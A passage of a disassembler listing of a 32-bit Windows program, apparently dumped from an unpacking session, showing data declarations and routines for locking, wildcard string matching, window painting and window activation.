; sub_40981F+AD�r ...
dword_43F718 dd 77D49A11h ; DATA XREF: sub_4087EE+1EC�r
; sub_4089E7+232�r ...
align 10h
dword_43F720 dd 76D62A37h ; DATA XREF: sub_40981F+909�w
; sub_40981F+91D�r ...
off_43F724 dd offset sub_49B1C7 ; DATA XREF: sub_40981F+99�w
; sub_40981F+EA�r ...
dword_43F728 dd 0 ; DATA XREF: sub_40981F:loc_40991D�w
; sub_40981F+12B�w ...
dword_43F72C dd 0 ; DATA XREF: sub_40981F+126�w
; sub_40A4AC+1C�r
dword_43F730 dd 0 ; DATA XREF: sub_40981F:loc_409A0D�w
; sub_40981F:loc_409A74�w ...
dword_43F734 dd 0 ; DATA XREF: sub_40981F+250�w
; sub_40A4AC+50�r
dword_43F738 dd 0 ; DATA XREF: sub_40981F:loc_409B09�w
; sub_40981F:loc_409B4E�w ...
dword_43F73C dd 0 ; DATA XREF: sub_40981F+400�w
; sub_40A4AC+84�r
dword_43F740 dd 0 ; DATA XREF: sub_40981F:loc_409D05�w
; sub_40A4AC:loc_40A55C�r
dword_43F744 dd 0 ; DATA XREF: sub_40981F+4E1�w
; sub_40A4AC+B8�r
dword_43F748 dd 0 ; DATA XREF: sub_40981F:loc_409FD6�w
; sub_40A4AC:loc_40A590�r
dword_43F74C dd 0 ; DATA XREF: sub_40981F+7B2�w
; sub_40A4AC+EC�r
dword_43F750 dd 0 ; DATA XREF: sub_40981F:loc_40A0C1�w
; sub_40981F+8D1�w ...
dword_43F754 dd 0 ; DATA XREF: sub_40981F+8CC�w
; sub_40A4AC+120�r
dword_43F758 dd 0 ; DATA XREF: sub_40981F:loc_40A155�w
; sub_40A4AC:loc_40A5F8�r ...
dword_43F75C dd 0 ; DATA XREF: sub_40981F+931�w
; sub_40A4AC+154�r
dword_43F760 dd 0 ; DATA XREF: sub_40981F:loc_40A260�w
; sub_40A4AC:loc_40A62C�r ...
dword_43F764 dd 0 ; DATA XREF: sub_40981F+A3C�w
; sub_40A4AC+188�r
dword_43F768 dd 0 ; DATA XREF: sub_40981F:loc_40A2AA�w
; sub_40A4AC:loc_40A660�r
dword_43F76C dd 0 ; DATA XREF: sub_40981F+A86�w
; sub_40A4AC+1BC�r
dword_43F770 dd 0 ; DATA XREF: sub_40981F:loc_40A2F4�w
; sub_40A4AC:loc_40A694�r
dword_43F774 dd 0 ; DATA XREF: sub_40981F+AD0�w
; sub_40A4AC+1F0�r
dword_43F778 dd 0 ; DATA XREF: sub_40981F:loc_40A368�w
; sub_40A4AC:loc_40A6C8�r
dword_43F77C dd 0 ; DATA XREF: sub_40981F+B44�w
; sub_40A4AC+224�r
dword_43F780 dd 0 ; DATA XREF: sub_40981F:loc_40A3B2�w
; sub_40A4AC:loc_40A6FC�r
dword_43F784 dd 0 ; DATA XREF: sub_40981F+B8E�w
; sub_40A4AC+258�r
dword_43F788 dd 0 ; DATA XREF: sub_40981F:loc_40A450�w
; sub_40A4AC:loc_40A730�r
dword_43F78C dd 0 ; DATA XREF: sub_40981F+C2C�w
; sub_40A4AC+28C�r
dword_43F790 dd 0 ; DATA XREF: sub_40981F:loc_40A49A�w
; sub_40A4AC:loc_40A764�r
dword_43F794 dd 0 ; DATA XREF: sub_40981F+C76�w
; sub_40A4AC+2C0�r
dword_43F798 dd 81h dup(0) ; DATA XREF: sub_40AA35+6A�o
dword_43F99C dd 5 dup(0) ; DATA XREF: sub_40AEE0+32�o
dword_43F9B0 dd 0 ; DATA XREF: sub_40B328:loc_40B349�r
; sub_40B417+54�r ...
dword_43F9B4 dd 0 ; DATA XREF: sub_40B328�r
; sub_40B417+37�r ...
dword_43F9B8 dd 0 ; DATA XREF: sub_40B358+1A�r
; sub_40B56C+83�o
dword_43F9BC dd 0 ; DATA XREF: sub_40B328:loc_40B33C�r
; sub_40B56C+11B�w
dword_43F9C0 dd 0Dh dup(0) ; DATA XREF: sub_40B417+13�o
; sub_40B56C:loc_40B6A9�o
dword_43F9F4 dd 0 ; DATA XREF: sub_40B417+CD�r
; sub_40B417+EC�r ...
dd 0
dword_43F9FC dd 0Eh dup(0) ; DATA XREF: sub_40B721+47�o
dword_43FA34 dd 1000h dup(0) ; DATA XREF: sub_40BF6D+1D�o
; sub_40C00D�o ...
dword_443A34 dd 0 ; DATA XREF: sub_40BF6D+13�o
; sub_40C00D+E�o ...
dword_443A38 dd 0Eh dup(0) ; DATA XREF: sub_40D01A+F�o
dword_443A70 dd 2 dup(0) ; DATA XREF: sub_40D3A5+C8�o
dword_443A78 dd 17h dup(0) ; DATA XREF: sub_40D835:loc_40D952�o
; sub_40D835+131�o ...
dword_443AD4 dd 80h dup(0) ; DATA XREF: sub_40E5EB+7C�o
; sub_40E5EB+A5�o
dword_443CD4 dd 0 ; DATA XREF: sub_40DBB0+45�w
; sub_40DBB0+4D�r ...
dword_443CD8 dd 17h dup(0) ; DATA XREF: sub_40E4B7:loc_40E5D9�o
; sub_40E4B7+12D�o
dword_443D34 dd 80h dup(0) ; DATA XREF: sub_40DAF0+4C�o
; sub_40DAF0+7E�o ...
byte_443F34 db 0 ; DATA XREF: sub_40DBB0+29�r
; sub_40DBB0+34�w
align 4
dword_443F38 dd 80h dup(0) ; DATA XREF: sub_40DE07+61�o
; sub_40DE07+89�o ...
dword_444138 dd 82h dup(0) ; DATA XREF: sub_40D719:loc_40D751�o
; sub_40D719+5B�o
dword_444340 dd 0 ; DATA XREF: sub_40BE75+A�o
; sub_40BE75+44�r ...
dd 5 dup(0)
dword_444358 dd 0 ; DATA XREF: sub_40BE75+60�r
; sub_40EE72+BD6�r
dd 2D9h dup(0)
dword_444EC0 dd 0 ; DATA XREF: sub_407767+A8�r
; sub_40BE75+2D�o ...
dd 7Fh dup(0)
dword_4450C0 dd 0 ; DATA XREF: sub_416D5A+41�w
; sub_416E95+40�w ...
dword_4450C4 dd 0 ; DATA XREF: sub_4060D0+23B�w
; sub_407767:loc_4077AE�r ...
dword_4450C8 dd 0 ; DATA XREF: sub_40B56C+164�w
; sub_41680E+AE�w ...
dword_4450CC dd 0 ; DATA XREF: sub_402688+E0�w
; sub_405AF2+7E�w ...
dword_4450D0 dd 0 ; DATA XREF: sub_407D66+11E�w
; sub_407F4D+53�r ...
dword_4450D4 dd 0 ; DATA XREF: sub_4060D0+268�w
; sub_407252+122�w ...
byte_4450D8 db 0 ; DATA XREF: sub_40EB92+91�o
; sub_40EE72+3357�r ...
align 4
dd 19Dh dup(0)
dword_445750 dd 6A2Ch dup(0) ; DATA XREF: _2:off_42A2D0�o
dword_460000 dd 0A714h dup(0) ; DATA XREF: _4:00491B4C�o
dword_489C50 dd 1Ch ; DATA XREF: sub_407110:loc_40717E�r
; sub_40E6A9+3A�w ...
align 8
dword_489C58 dd 0 ; DATA XREF: sub_40E6A9:loc_40EAA4�o
dword_489C5C dd 20h dup(0) ; DATA XREF: sub_40E6A9+393�o
; sub_40E6A9+44C�o ...
dword_489CDC dd 10h dup(0) ; DATA XREF: sub_40E6A9+3AA�o
; sub_40EE72+929�o
dword_489D1C dd 24h dup(0) ; DATA XREF: sub_40E6A9+3C1�o
dword_489DAC dd 0 ; DATA XREF: sub_40E6A9+3B5�w
; sub_40E6A9+463�w ...
dword_489DB0 dd 0 ; DATA XREF: sub_40E6A9+3D4�w
align 10h
dword_489DC0 dd 0 ; DATA XREF: sub_40EB92+72�r
; sub_40EE72+273�r
align 8
byte_489DC8 db 0 ; DATA XREF: sub_40ECFA+28�r
; sub_40ECFA+30�o
align 4
dword_489DCC dd 0 ; DATA XREF: sub_40E6A9+400�w
; sub_40E6A9+417�r ...
dword_489DD0 dd 0 ; DATA XREF: sub_40E6A9+398�w
; sub_40EE72+8CA�r
dd 2 dup(0)
dword_489DDC dd 0 ; DATA XREF: sub_41547E+146�r
dd 0
dword_489DE4 dd 1Bh dup(0) ; DATA XREF: sub_415D68+8D�o
dword_489E50 dd 0 ; DATA XREF: sub_416FA2+16�o
; sub_416FC1+19�o
dword_489E54 dd 65h dup(0) ; DATA XREF: sub_416F55+3D�o
byte_489FE8 db 0 ; DATA XREF: sub_416C53+6A�r
; sub_416C53+98�w
align 4
dd 2 dup(0)
dword_489FF4 dd 0 ; DATA XREF: sub_417D73+A�w
dword_489FF8 dd 0 ; DATA XREF: sub_4186B1+5E�r
; sub_4186B1+A4�w
align 10h
word_48A000 dw 0 ; DATA XREF: sub_4186B1+55�r
; sub_4186B1+9A�o
word_48A002 dw 0 ; DATA XREF: sub_4186B1+48�r
db 2 dup(0)
word_48A006 dw 0 ; DATA XREF: sub_4186B1+3B�r
word_48A008 dw 0 ; DATA XREF: sub_4186B1+2E�r
word_48A00A dw 0 ; DATA XREF: sub_4186B1+21�r
align 10h
dword_48A010 dd 0 ; DATA XREF: sub_418B6E+3B�r
; sub_418B6E+91�w
dword_48A014 dd 0 ; DATA XREF: sub_418833+1B9�w
; sub_418D0E:loc_418D8A�w ...
dword_48A018 dd 0 ; DATA XREF: sub_4197F9+35�w
; sub_41A6B7:loc_41A751�w ...
dword_48A01C dd 0 ; DATA XREF: sub_41FEC6+13A�r
dword_48A020 dd 0A28h ; DATA XREF: _0:00419C36�w
dword_48A024 dd 501h ; DATA XREF: _0:00419C2D�w
dword_48A028 dd 5 ; DATA XREF: _0:00419C22�w
dword_48A02C dd 1 ; DATA XREF: _0:00419C14�w
dword_48A030 dd 1 ; DATA XREF: sub_40E6A9:loc_40E98C�r
; sub_41F240+91�w
dword_48A034 dd 0A30B20h ; DATA XREF: sub_40E6A9+2EC�r
; sub_40E6A9+30C�r ...
dd 0
dword_48A03C dd 0A30B48h ; DATA XREF: sub_41F187+44�w
; sub_421DAE+9�r ...
dword_48A040 dd 0 ; DATA XREF: sub_422492+36�r
dword_48A044 dd 0 ; DATA XREF: sub_421DAE+16�r
; sub_42217C+4�r ...
dd 0
off_48A04C dd offset aCM_unpackerPac ; DATA XREF: sub_41F240+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_48A054 db 0 ; DATA XREF: sub_419B07+2D�w
; sub_41FAE7+5�r
align 4
dword_48A058 dd 0 ; DATA XREF: sub_419B07+27�w
dword_48A05C dd 0 ; DATA XREF: sub_419B07+4�r
; sub_419B07+8B�w
dword_48A060 dd 0 ; DATA XREF: _0:00419C68�w
; sub_41F187:loc_41F199�r ...
align 8
dword_48A068 dd 0 ; DATA XREF: sub_419CDA�r sub_419CFF�r ...
dword_48A06C dd 0 ; DATA XREF: sub_41A8A2+37�r
dd 0
dword_48A074 dd 0 ; DATA XREF: sub_417B89�r
; sub_41944F:loc_41956B�r ...
dword_48A078 dd 0 ; DATA XREF: sub_41AB54�r
dword_48A07C dd 0 ; DATA XREF: sub_41BA22+4B�w
; sub_41BB3B+2D�w ...
dword_48A080 dd 0 ; DATA XREF: sub_41C96D+11�r
; sub_41CA71+1A�r ...
byte_48A084 db 0 ; DATA XREF: sub_41C96D+3�r
; sub_41C96D+98�r ...
align 4
dword_48A088 dd 0 ; DATA XREF: sub_41CA71+11�r
; sub_41CB4F+21�w ...
byte_48A08C db 0 ; DATA XREF: sub_41CB4F+51�w
align 10h
dword_48A090 dd 0 ; DATA XREF: sub_41CD45+4E�r
; sub_41D120+3A�r ...
dword_48A094 dd 0 ; DATA XREF: sub_41CD45+5C�r
; sub_41D120+43�r ...
dword_48A098 dd 0 ; DATA XREF: sub_417FFA+7A�r
; sub_41CEEC+5�r
dword_48A09C dd 0 ; DATA XREF: sub_41D4FC+29�r
dword_48A0A0 dd 2 dup(0) ; DATA XREF: sub_418790+C�o
dword_48A0A8 dd 0 ; DATA XREF: sub_419063+4�r
; sub_419063+6E�r ...
dd 3 dup(0)
dword_48A0B8 dd 0 ; DATA XREF: sub_4199B9+61�r
; sub_4199B9+BF�r ...
align 10h
dword_48A0C0 dd 1 ; DATA XREF: sub_41E709+28�r
; sub_41E709+4C�w ...
dword_48A0C4 dd 1 ; DATA XREF: sub_41E92D:loc_41EAA8�r
; sub_41EAC6+4�w ...
dword_48A0C8 dd 0 ; DATA XREF: sub_41EFAB+3A�r
; sub_41EFAB+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41F240:loc_41F257�o
; _2:off_48A04C�o
align 4
dd 3Ah dup(0)
dword_48A1D0 dd 1 ; DATA XREF: sub_41F48D+2�r
; sub_41F48D+23�w ...
dword_48A1D4 dd 0 ; DATA XREF: sub_41F84C+21�r
dword_48A1D8 dd 0 ; DATA XREF: sub_41A8A2:loc_41A8CB�w
; sub_41A96C+154�w ...
dword_48A1DC dd 1 ; DATA XREF: sub_41FB63+26�r
; sub_41FB63:loc_41FBCD�w
dword_48A1E0 dd 0 ; DATA XREF: sub_41A96C+7�r
align 8
word_48A1E8 dw 0 ; DATA XREF: sub_42074B+1A�o
; sub_42074B+46�r
byte_48A1EA db 0 ; DATA XREF: sub_42074B+39�r
align 4
dword_48A1EC dd 7 dup(0) ; DATA XREF: sub_42074B+52�o
dword_48A208 dd 0 ; DATA XREF: sub_42074B+40�w
; sub_42074B+5C�o
dword_48A20C dd 0 ; DATA XREF: sub_42074B+4D�w
dword_48A210 dd 0 ; DATA XREF: sub_42074B+31�w
dword_48A214 dd 0 ; DATA XREF: sub_42074B+52�w
dword_48A218 dd 77C26E79h ; DATA XREF: sub_42086E:loc_420891�r
; sub_42086E+38�r ...
align 10h
dword_48A220 dd 0 ; DATA XREF: sub_42094E+11�w
; sub_42094E+63�w ...
align 8
dword_48A228 dd 0 ; DATA XREF: sub_42094E+33�o
; sub_42094E+46�r
dword_48A22C dd 10h dup(0) ; DATA XREF: sub_42094E+C1�o
word_48A26C dw 0 ; DATA XREF: sub_420BAC+A8�r
word_48A26E dw 0 ; DATA XREF: sub_42094E+54�r
; sub_420BAC+DB�r ...
word_48A270 dw 0 ; DATA XREF: sub_420BAC+CA�r
word_48A272 dw 0 ; DATA XREF: sub_420BAC+D3�r
; sub_420BAC:loc_420C9E�r
word_48A274 dw 0 ; DATA XREF: sub_420BAC+C0�r
word_48A276 dw 0 ; DATA XREF: sub_420BAC+B8�r
word_48A278 dw 0 ; DATA XREF: sub_420BAC+B0�r
word_48A27A dw 0 ; DATA XREF: sub_420BAC+9E�r
dword_48A27C dd 0 ; DATA XREF: sub_42094E+4B�r
dword_48A280 dd 10h dup(0) ; DATA XREF: sub_42094E+FB�o
word_48A2C0 dw 0 ; DATA XREF: sub_420BAC+46�r
word_48A2C2 dw 0 ; DATA XREF: sub_42094E:loc_4209C5�r
; sub_420BAC+78�r ...
word_48A2C4 dw 0 ; DATA XREF: sub_420BAC+67�r
word_48A2C6 dw 0 ; DATA XREF: sub_420BAC+70�r
; sub_420BAC:loc_420C30�r
word_48A2C8 dw 0 ; DATA XREF: sub_420BAC+5D�r
word_48A2CA dw 0 ; DATA XREF: sub_420BAC+55�r
word_48A2CC dw 0 ; DATA XREF: sub_420BAC+4D�r
word_48A2CE dw 0 ; DATA XREF: sub_420BAC+3E�r
dword_48A2D0 dd 0 ; DATA XREF: sub_42094E+80�r
dword_48A2D4 dd 0 ; DATA XREF: sub_42094E+132�r
; sub_42094E:loc_420A9A�r ...
dword_48A2D8 dd 0 ; DATA XREF: sub_420939�r sub_420939+E�w
dword_48A2DC dd 0 ; DATA XREF: sub_42105F+3�r
; sub_42105F+2E�w ...
dword_48A2E0 dd 0 ; DATA XREF: sub_42105F+43�w
; sub_42105F:loc_4210AE�r
dword_48A2E4 dd 0 ; DATA XREF: sub_42105F+4A�w
; sub_42105F+60�r
dword_48A2E8 dd 0 ; DATA XREF: sub_41FEC6+3F�r
dword_48A2EC dd 0 ; DATA XREF: sub_421C3C:loc_421CA3�r
; sub_421C3C+6D�o
dword_48A2F0 dd 0 ; DATA XREF: sub_421C3C:loc_421C7A�r
; sub_421C3C+44�o
dword_48A2F4 dd 0 ; DATA XREF: sub_421C3C:loc_421C6D�r
; sub_421C3C+37�o
dword_48A2F8 dd 0 ; DATA XREF: sub_421C3C:loc_421C87�r
; sub_421C3C+51�o
align 10h
dword_48A300 dd 0 ; DATA XREF: sub_4221EA+28�r
; sub_4221EA+48�w ...
dword_48A304 dd 0 ; DATA XREF: sub_422C78+28�r
; sub_422C78+4C�w ...
dword_48A308 dd 0 ; DATA XREF: sub_422F03+26�r
; sub_422F03:loc_422F6D�w
byte_48A30C db 1 ; DATA XREF: sub_40482C�r sub_40482C+9�w
align 10h
dword_48A310 dd 0A31110h ; DATA XREF: sub_41A835:loc_41A846�r
; sub_41AADC+14�r ...
align 10h
dword_48A320 dd 400h dup(0) ; DATA XREF: _2:off_43BCB8�o
; _2:0043BCC0�o
dword_48B320 dd 200h ; DATA XREF: sub_41A835+9�r
; sub_41A835+56�r ...
dd 7 dup(0)
dword_48B340 dd 0A30650h ; DATA XREF: sub_419D23+B1�r
; sub_41E248+75�r ...
dword_48B344 dd 3Fh dup(0) ; DATA XREF: sub_41F5BF+92�o
dword_48B440 dd 20h ; DATA XREF: sub_41A6B7+8�r
; sub_41E321+C�r ...
dword_48B444 dd 4E4h ; DATA XREF: sub_41E92D+14�r
; sub_41E92D+65�w ...
align 10h
dword_48B450 dd 3 dup(0) ; DATA XREF: sub_41E92D+123�o
; sub_41E92D+171�o ...
dword_48B45C dd 0 ; DATA XREF: sub_41E92D+108�w
; sub_41E92D+15D�w ...
byte_48B460 db 0 ; DATA XREF: sub_41EB6C:loc_41EC78�w
; sub_41EB6C:loc_41EC95�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_48B560 db 0 ; DATA XREF: sub_41E92D+5C�o
; sub_41E92D+AF�o ...
byte_48B561 db 0 ; DATA XREF: sub_4192B8+5D�r
; sub_41E92D+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_48B664 dd 0 ; DATA XREF: sub_41E92D+6E�w
; sub_41E92D+12B�w ...
dword_48B668 dd 0 ; DATA XREF: sub_41AD41+3C�w
; sub_41B3E6+5�r ...
dword_48B66C dd 0 ; DATA XREF: sub_41ADB4+23A�r
; sub_41ADB4+25A�r ...
dword_48B670 dd 0 ; DATA XREF: sub_41AD41+31�w
; sub_41ADB4+311�w ...
dword_48B674 dd 0 ; DATA XREF: sub_41AD41+21�w
; sub_41ADB4+22D�r ...
dword_48B678 dd 0 ; DATA XREF: sub_41AD41+28�w
; sub_41AD89�r ...
dword_48B67C dd 0 ; DATA XREF: sub_41AD41+15�w
; sub_41AD89+8�r ...
dword_48B680 dd 0 ; DATA XREF: sub_417BC7+F�r
; sub_41944F+5C�r ...
dword_48B684 dd 0A30000h ; DATA XREF: sub_417BC7+66�r
; sub_417C3B+5A�r ...
dword_48B688 dd 1 ; DATA XREF: sub_417BC7�r sub_417C3B+C�r ...
dword_48B68C dd 142340h ; DATA XREF: _0:00419C5E�w
; sub_41F12F+F�r ...
dword_48B690 dd 1 ; DATA XREF: sub_41F187+AD�w
; sub_421DAE�r
dword_48B694 dd 1 ; DATA XREF: sub_41ECF1�r
; sub_41ECF1+11�w ...
dword_48B698 dd 0A3075Ch ; DATA XREF: sub_418603+13�r
; sub_418603:loc_418645�r ...
dword_48B69C dd 0A30758h ; DATA XREF: sub_418603+1�r
; sub_418603+C�r ...
_2 ends
; Section 4. (virtual address 0008C000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 0008C000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_3 segment para public 'CODE' use32
assume cs:_3
;org 48C000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h
_3 ends
; Section 5. (virtual address 0008D000)
; Virtual size : 00011ABF ( 72383.)
; Section size in file : 00011ABF ( 72383.)
; Offset to raw data for section: 0008D000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_4 segment para public 'CODE' use32
assume cs:_4
;org 48D000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D000 proc near ; CODE XREF: sub_49063E+84�p
; sub_49094C+333�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F2E0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_1C], esi
lea eax, [esi+10h]
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, esi
call sub_49C98E
or [ebp+var_4], 0FFFFFFFFh
call sub_48D060
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_48D000 endp
; =============== S U B R O U T I N E =======================================
sub_48D05D proc near ; DATA XREF: _5:0049F2E8�o
mov esi, [ebp-1Ch]
sub_48D05D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48D060 proc near ; CODE XREF: sub_48D000+47�p
add esi, 10h
push esi
call ds:dword_49F018 ; RtlLeaveCriticalSection
retn
sub_48D060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D06B proc near ; CODE XREF: sub_490166+9B�p
; sub_490166+C4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
push edi
test edx, edx
jz short loc_48D07D
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_48D081
loc_48D07D: ; CODE XREF: sub_48D06B+9�j
xor eax, eax
jmp short loc_48D0D3
; ---------------------------------------------------------------------------
loc_48D081: ; CODE XREF: sub_48D06B+10�j
cmp byte ptr [edx], 0
jnz short loc_48D08F
xor eax, eax
cmp [edi], al
setz al
jmp short loc_48D0D3
; ---------------------------------------------------------------------------
loc_48D08F: ; CODE XREF: sub_48D06B+19�j
push ebx
push esi
mov esi, offset dword_4A1BE4
mov eax, edi
loc_48D098: ; CODE XREF: sub_48D06B+49�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_48D0BA
test cl, cl
jz short loc_48D0B6
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_48D0BA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_48D098
loc_48D0B6: ; CODE XREF: sub_48D06B+37�j
xor eax, eax
jmp short loc_48D0BF
; ---------------------------------------------------------------------------
loc_48D0BA: ; CODE XREF: sub_48D06B+33�j
; sub_48D06B+41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_48D0BF: ; CODE XREF: sub_48D06B+4D�j
pop esi
pop ebx
test eax, eax
jnz short loc_48D0CA
mov edi, offset dword_4A1BE0
loc_48D0CA: ; CODE XREF: sub_48D06B+58�j
push edx
push edi
call sub_48D0D6
pop ecx
pop ecx
loc_48D0D3: ; CODE XREF: sub_48D06B+14�j
; sub_48D06B+22�j
pop edi
pop ebp
retn
sub_48D06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D0D6 proc near ; CODE XREF: sub_48D06B+61�p
; sub_48D0D6+70�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov al, [ebx]
push edi
test al, al
jz short loc_48D120
loc_48D0E8: ; CODE XREF: sub_48D0D6+48�j
movsx edi, byte ptr [esi]
movsx eax, al
inc ebx
cmp eax, 2Ah
jz short loc_48D130
cmp eax, 3Fh
jz short loc_48D115
push eax
call sub_48D86E
mov edx, eax
push edi
mov [ebp+arg_4], edx
call sub_48D86E
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_48D12C
jmp short loc_48D119
; ---------------------------------------------------------------------------
loc_48D115: ; CODE XREF: sub_48D0D6+21�j
test edi, edi
jz short loc_48D12C
loc_48D119: ; CODE XREF: sub_48D0D6+3D�j
mov al, [ebx]
inc esi
test al, al
jnz short loc_48D0E8
loc_48D120: ; CODE XREF: sub_48D0D6+10�j
xor eax, eax
cmp [esi], al
setz al
loc_48D127: ; CODE XREF: sub_48D0D6+58�j
; sub_48D0D6+86�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_48D12C: ; CODE XREF: sub_48D0D6+3B�j
; sub_48D0D6+41�j ...
xor eax, eax
jmp short loc_48D127
; ---------------------------------------------------------------------------
loc_48D130: ; CODE XREF: sub_48D0D6+1C�j
xor edi, edi
cmp byte ptr [esi], 0
jz short loc_48D142
loc_48D137: ; CODE XREF: sub_48D0D6+66�j
inc edi
cmp byte ptr [edi+esi], 0
jnz short loc_48D137
test edi, edi
jl short loc_48D12C
loc_48D142: ; CODE XREF: sub_48D0D6+5F�j
add esi, edi
loc_48D144: ; CODE XREF: sub_48D0D6+7F�j
push esi
push ebx
call sub_48D0D6
pop ecx
test eax, eax
pop ecx
jnz short loc_48D159
dec edi
dec esi
test edi, edi
jge short loc_48D144
jmp short loc_48D12C
; ---------------------------------------------------------------------------
loc_48D159: ; CODE XREF: sub_48D0D6+79�j
push 1
pop eax
jmp short loc_48D127
sub_48D0D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D15E proc near ; DATA XREF: sub_48D271+36�o
var_60 = dword ptr -60h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
push edi
cmp [ebp+arg_4], 0Fh
jnz loc_48D1FF
and [ebp+var_20], 0
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_20]
push eax
push 18h
push ds:dword_4A6A50
call ds:dword_4A27F8 ; GetObjectA
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4A27F0 ; BeginPaint
push [ebp+var_60]
call ds:dword_4A27E0 ; CreateCompatibleDC
mov [ebp+var_8], eax
push ds:dword_4A6A50
push [ebp+var_8]
call ds:dword_4A27FC ; SelectObject
mov [ebp+var_4], eax
push 0CC0020h
push 0
push 0
push [ebp+var_8]
push [ebp+var_18]
push [ebp+var_1C]
push 0
push 0
push [ebp+var_60]
call ds:dword_4A2804 ; BitBlt
push [ebp+var_4]
push [ebp+var_8]
call ds:dword_4A27FC ; SelectObject
push [ebp+var_8]
call ds:dword_4A27E8 ; DeleteDC
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4A27F4 ; EndPaint
xor eax, eax
jmp short loc_48D211
; ---------------------------------------------------------------------------
loc_48D1FF: ; CODE XREF: sub_48D15E+B�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F050 ; DefWindowProcA
loc_48D211: ; CODE XREF: sub_48D15E+9F�j
pop edi
leave
retn 10h
sub_48D15E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D216 proc near ; DATA XREF: sub_48D271+152�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_4A2808 ; GetWindowThreadProcessId
call ds:dword_4A26E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_48D26A
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4A6A54
jz short loc_48D26A
push ds:dword_4A6A54
call ds:dword_4A282C ; DestroyWindow
and ds:dword_4A6A54, 0
push [ebp+arg_0]
call ds:dword_4A280C ; SetActiveWindow
push [ebp+arg_0]
call ds:dword_4A2810 ; SetForegroundWindow
xor eax, eax
jmp short locret_48D26D
; ---------------------------------------------------------------------------
loc_48D26A: ; CODE XREF: sub_48D216+1E�j
; sub_48D216+29�j
push 1
pop eax
locret_48D26D: ; CODE XREF: sub_48D216+52�j
leave
retn 8
sub_48D216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D271 proc near ; DATA XREF: sub_48D3F3+3C�o
var_58 = dword ptr -58h
